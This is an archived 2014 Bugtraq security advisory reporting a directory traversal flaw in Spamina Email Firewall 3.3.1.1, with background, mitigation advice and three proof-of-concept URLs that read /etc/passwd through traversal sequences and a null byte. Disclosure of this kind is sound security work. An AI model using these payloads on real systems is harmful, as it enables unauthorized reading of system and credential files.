lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201401071457.s07EvVct012100@sf01web3.securityfocus.com>
Date: Tue, 7 Jan 2014 14:57:31 GMT
From: sisco.barrera@...il.com
To: bugtraq@...urityfocus.com
Subject: SPAMINA EMAIL FIREWALL 3.3.1.1 - Directory Traversal -

Vulnerability in the web application of Spamina email firewall.

Vulnerability Type: Directory Traversal

- Original release date: October 3th, 2013
- Last revised: December 9th, 2013
- Discovered by: Sisco Barrera - A2SECURE

Products and affected versions:
SPAMINA EMAIL FIREWALL 3.3.1.1 (maybe other versions also vulnerable)


Vulnerability Discovered by: Sisco Barrera - sisco.barrera@...il.com	
Company: A2SECURE - Espaņa
A2Secure Website: http://www.a2secure.com
Vendor Website: http://www.spamina.com
Application Website: http://es.spamina.com/es/products.php?pob=CloudEmailFirewall


======================
Background
======================

Spamina is a global leader in offering innovative Cloud-based E-mail & Web security solutions. Our security solutions help organizations to instantly secure and manage their information while maintaining compliance and corporate policies. Spamina solutions include Cloud Email Firewall, Cloud Email Encryption & DLP, Cloud Email Archiving and Cloud Web Security to provide Web traffic filtering.



======================
Vulnerability Details
======================

A directory-traversal attack is based on the premise that web clients are limited to specific directories within the Windows files system. The initial directory access by web clients is known as the root directory on a web server. This root directory typically stores the home page usually known as Default or Index, as well as other HTML documents for the web server. The web server should allow users to access only these specific directories and subdirectories of root. However, a directory- traversal attack permits access to other directories within the file system. The encoded version of / (slash) in ../ directory traversal request (%2E%2E%2F) seems to be now fixed, after our previous alert.

Spamina should define access rights to private folders on the web server, implement a special characters filtering, apply patches and hotfixes.

======================
Proof of Concepts
======================

This URLs just show the directory traversal are this:

https://xxx.xxx.xxx.xxx/?action=showHome&language=../../../../../../../../../../etc/passwd%00.jpg

https://xxx.xxx.xxx.xxx/multiadmin/js/lib/?action=../../../../../../../../../../etc/passwd&language=de

https://xxx.xxx.xxx.xxx/index.php?action=userLogin&language=../../../../../../../../../../etc/passwd.jpg

======================
Credits/Author
======================

Sisco Barrera
a2secure.com

======================
Disclaimer
======================

All information is provided without warranty. The intent is to provide information to secure infrastructure and/or systems, not to be able to attack or damage. Therefore A2Secure shall not be liable for any direct or indirect damages that might be caused by using this information.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ